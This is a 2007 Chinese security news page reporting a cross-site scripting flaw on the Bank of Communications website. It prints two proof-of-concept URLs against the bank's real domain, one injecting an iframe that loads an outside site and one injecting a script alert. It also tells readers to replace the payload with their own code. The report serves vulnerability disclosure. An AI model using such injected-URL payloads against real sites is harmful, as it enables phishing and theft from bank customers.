小心啦:交通银行网页存在跨站漏洞
|
|
| 作者:佚名 来源:IT新闻中心
更新时间:2007-6-26 【字体:小
大】 |
|
<%=(int(rnd()*1)+1)%>您当前的位置:中国安全在线cnsafer.com 请进入[技术论坛]发表新闻评论
阅读提示:交通银行网页存在跨站漏洞,可以在页面中挂iframe,英文版和繁体版均存在此问题。
交通银行网页存在跨站漏洞,可以在页面中挂iframe,英文版和繁体版均存在此问题,以下是测试过程:
提交:
http://www.bankcomm.com/jh/cn/detail.jsp?c=1121231469100&id=1176793794100&type=CMS.STD&cName=业务推介<iframe%20src=http://www.315safe.com></iframe>
点击这里测试
提交:
http://www.bankcomm.com/jh/cn/detail.jsp?c=1121231469100&id=1176793794100&type=CMS.STD&cName=业务推介<script>alert("315SAFE安全检测")</script>
点击这里测试
其他的不演示了
把上面URL中“业务推荐”后的代码换成你的即可。
您对本文章有什么意见或着疑问吗?请到论坛讨论您的关注和建议是我们前行的参考和动力 |
| 新闻资讯录入:ls1238 责任编辑:ls1238
|
|
上一篇新闻资讯: 黑客为晋级狂黑沈企网站
下一篇新闻资讯: 大事记:黑客之前世今生 |
| 【字体:小
大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】
|
网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)